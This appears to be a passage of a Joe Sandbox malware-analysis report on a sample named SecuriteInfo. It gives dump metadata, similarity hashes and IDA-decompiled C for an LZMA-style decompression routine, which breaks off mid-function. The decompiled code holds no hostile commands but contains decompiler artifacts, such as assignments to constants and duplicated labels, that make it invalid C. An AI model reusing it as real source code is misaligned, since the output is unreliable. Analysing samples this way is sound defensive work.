                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x0040734c
                                                                                              0x00407350
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00407356
                                                                                              0x00407359
                                                                                              0x0040735c
                                                                                              0x0040735f
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407361
                                                                                              0x00407364
                                                                                              0x00407367
                                                                                              0x0040736a
                                                                                              0x0040736d
                                                                                              0x00407370
                                                                                              0x00407373
                                                                                              0x00407374
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407376
                                                                                              0x00407379
                                                                                              0x0040737c
                                                                                              0x0040737f
                                                                                              0x00407382
                                                                                              0x00407385
                                                                                              0x00407389
                                                                                              0x0040738b
                                                                                              0x0040738e
                                                                                              0x00000000
                                                                                              0x00407390
                                                                                              0x0040710d
                                                                                              0x0040710d
                                                                                              0x00000000
                                                                                              0x0040710d
                                                                                              0x0040738e
                                                                                              0x004075c3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406bf2
                                                                                              0x004075fa
                                                                                              0x004075fa
                                                                                              0x00000000
                                                                                              0x004075fa
                                                                                              0x00407447
                                                                                              0x004073ce
                                                                                              0x004073cb
                                                                                              0x00000000
                                                                                              0x00407002

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                                              • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                                              • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040711C Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 98%
                                                                                              			E0040711C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
